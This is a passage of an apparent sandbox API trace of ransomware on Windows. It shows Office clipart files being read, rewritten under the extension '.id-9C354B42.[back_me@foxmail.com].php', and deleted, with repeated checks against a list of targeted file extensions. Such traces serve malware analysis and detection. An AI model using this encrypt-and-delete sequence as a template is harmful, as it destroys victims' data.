hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.660] SetEndOfFile (hFile=0x37c) returned 1 [0263.663] CloseHandle (hObject=0x37c) returned 1 [0263.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.667] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf")) returned 1 [0263.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.667] lstrlenW (lpString=".doc") returned 4 [0263.667] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.667] lstrlenW (lpString=".docx") returned 5 [0263.667] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0263.668] lstrlenW (lpString=".pdf") returned 4 [0263.668] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString=".xls") returned 4 [0263.668] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.668] lstrlenW (lpString=".xlsx") returned 5 [0263.668] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0263.668] lstrlenW (lpString=".ppt") returned 4 [0263.668] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.668] lstrlenW (lpString=".zip") returned 4 [0263.668] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.668] lstrlenW (lpString=".rar") returned 4 [0263.668] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString=".bz2") returned 4 [0263.668] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString=".7z") returned 3 [0263.668] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.668] lstrlenW (lpString=".dbf") returned 4 [0263.668] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.668] lstrlenW (lpString=".1cd") returned 4 [0263.668] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.668] lstrlenW (lpString=".jpg") returned 4 [0263.668] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.668] lstrlenW (lpString=".doc") returned 4 [0263.668] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.668] lstrlenW (lpString=".docx") returned 5 [0263.668] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0263.669] lstrlenW (lpString=".pdf") returned 4 [0263.669] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.669] lstrlenW (lpString=".xls") returned 4 [0263.669] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.669] lstrlenW (lpString=".xlsx") returned 5 [0263.669] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0263.669] lstrlenW (lpString=".ppt") returned 4 [0263.669] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.669] lstrlenW (lpString=".zip") returned 4 [0263.669] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.669] lstrlenW (lpString=".rar") returned 4 [0263.669] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.669] lstrlenW (lpString=".bz2") returned 4 [0263.669] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.669] lstrlenW (lpString=".7z") returned 3 [0263.669] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.669] lstrlenW (lpString=".dbf") returned 4 [0263.669] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.669] lstrlenW (lpString=".1cd") returned 4 [0263.669] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63 [0263.669] lstrlenW (lpString=".jpg") returned 4 [0263.669] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.669] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.669] lstrlenW (lpString="J0152694.WMF") returned 12 [0263.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0263.670] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=1348) returned 1 [0263.670] CloseHandle (hObject=0x3e8) returned 1 [0263.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf")) returned 0x20 [0263.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0263.670] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.670] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0263.671] GetLastError () returned 0x0 [0263.671] ReadFile (in: hFile=0x3e8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x544, lpOverlapped=0x0) returned 1 [0263.675] WriteFile (in: hFile=0x380, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x550, lpOverlapped=0x0) returned 1 [0263.676] ReadFile (in: hFile=0x3e8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.676] WriteFile (in: hFile=0x380, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.676] SetEndOfFile (hFile=0x380) returned 1 [0263.676] CloseHandle (hObject=0x380) returned 1 [0263.676] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.676] SetEndOfFile (hFile=0x3e8) returned 1 [0263.678] CloseHandle (hObject=0x3e8) returned 1 [0263.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf")) returned 1 [0263.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.750] lstrlenW (lpString=".doc") returned 4 [0263.750] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString=".docx") returned 5 [0263.750] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0263.750] lstrlenW (lpString=".pdf") returned 4 [0263.750] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString=".xls") returned 4 [0263.750] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.750] lstrlenW (lpString=".xlsx") returned 5 [0263.750] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0263.750] lstrlenW (lpString=".ppt") returned 4 [0263.750] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.750] lstrlenW (lpString=".zip") returned 4 [0263.750] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.750] lstrlenW (lpString=".rar") returned 4 [0263.750] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString=".bz2") returned 4 [0263.750] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString=".7z") returned 3 [0263.750] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.750] lstrlenW (lpString=".dbf") returned 4 [0263.750] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.750] lstrlenW (lpString=".1cd") returned 4 [0263.750] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.750] lstrlenW (lpString=".jpg") returned 4 [0263.750] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.751] lstrlenW (lpString=".doc") returned 4 [0263.751] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString=".docx") returned 5 [0263.751] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0263.751] lstrlenW (lpString=".pdf") returned 4 [0263.751] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString=".xls") returned 4 [0263.751] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.751] lstrlenW (lpString=".xlsx") returned 5 [0263.751] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0263.751] lstrlenW (lpString=".ppt") returned 4 [0263.751] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.751] lstrlenW (lpString=".zip") returned 4 [0263.751] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.751] lstrlenW (lpString=".rar") returned 4 [0263.751] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString=".bz2") returned 4 [0263.751] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString=".7z") returned 3 [0263.751] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.751] lstrlenW (lpString=".dbf") returned 4 [0263.751] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.751] lstrlenW (lpString=".1cd") returned 4 [0263.751] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63 [0263.751] lstrlenW (lpString=".jpg") returned 4 [0263.751] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.752] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.752] lstrlenW (lpString="J0152716.WMF") returned 12 [0263.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0263.752] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=4580) returned 1 [0263.752] CloseHandle (hObject=0x394) returned 1 [0263.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf")) returned 0x20 [0263.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0263.752] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.752] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0263.753] GetLastError () returned 0x0 [0263.753] ReadFile (in: hFile=0x394, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x11e4, lpOverlapped=0x0) returned 1 [0263.761] WriteFile (in: hFile=0x370, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x11f0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x11f0, lpOverlapped=0x0) returned 1 [0263.761] ReadFile (in: hFile=0x394, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.761] WriteFile (in: hFile=0x370, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.762] SetEndOfFile (hFile=0x370) returned 1 [0263.762] CloseHandle (hObject=0x370) returned 1 [0263.762] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.762] SetEndOfFile (hFile=0x394) returned 1 [0263.764] CloseHandle (hObject=0x394) returned 1 [0263.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.764] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf")) returned 1 [0263.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.764] lstrlenW (lpString=".doc") returned 4 [0263.764] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.764] lstrlenW (lpString=".docx") returned 5 [0263.764] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0263.764] lstrlenW (lpString=".pdf") returned 4 [0263.764] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.764] lstrlenW (lpString=".xls") returned 4 [0263.764] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.764] lstrlenW (lpString=".xlsx") returned 5 [0263.764] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0263.764] lstrlenW (lpString=".ppt") returned 4 [0263.764] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.765] lstrlenW (lpString=".zip") returned 4 [0263.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.765] lstrlenW (lpString=".rar") returned 4 [0263.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.765] lstrlenW (lpString=".bz2") returned 4 [0263.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.765] lstrlenW (lpString=".7z") returned 3 [0263.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.765] lstrlenW (lpString=".dbf") returned 4 [0263.924] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.924] lstrlenW (lpString=".1cd") returned 4 [0263.924] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.924] lstrlenW (lpString=".jpg") returned 4 [0263.924] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.924] lstrlenW (lpString=".doc") returned 4 [0263.924] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString=".docx") returned 5 [0263.924] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0263.924] lstrlenW (lpString=".pdf") returned 4 [0263.924] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString=".xls") returned 4 [0263.924] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.924] lstrlenW (lpString=".xlsx") returned 5 [0263.924] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0263.924] lstrlenW (lpString=".ppt") returned 4 [0263.924] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.924] lstrlenW (lpString=".zip") returned 4 [0263.924] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.924] lstrlenW (lpString=".rar") returned 4 [0263.924] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString=".bz2") returned 4 [0263.924] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.924] lstrlenW (lpString=".7z") returned 3 [0263.924] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.925] lstrlenW (lpString=".dbf") returned 4 [0263.925] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.925] lstrlenW (lpString=".1cd") returned 4 [0263.925] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63 [0263.925] lstrlenW (lpString=".jpg") returned 4 [0263.925] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.925] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.925] lstrlenW (lpString="J0152878.WMF") returned 12 [0263.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0263.993] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=14888) returned 1 [0263.994] CloseHandle (hObject=0x318) returned 1 [0263.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf")) returned 0x20 [0263.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0263.995] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.995] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0263.995] GetLastError () returned 0x0 [0263.995] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x3a28, lpOverlapped=0x0) returned 1 [0264.001] WriteFile (in: hFile=0x3dc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x3a30, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x3a30, lpOverlapped=0x0) returned 1 [0264.002] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.002] WriteFile (in: hFile=0x3dc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.002] SetEndOfFile (hFile=0x3dc) returned 1 [0264.002] CloseHandle (hObject=0x3dc) returned 1 [0264.003] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.003] SetEndOfFile (hFile=0x318) returned 1 [0264.005] CloseHandle (hObject=0x318) returned 1 [0264.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.005] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf")) returned 1 [0264.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.006] lstrlenW (lpString=".doc") returned 4 [0264.006] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString=".docx") returned 5 [0264.006] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 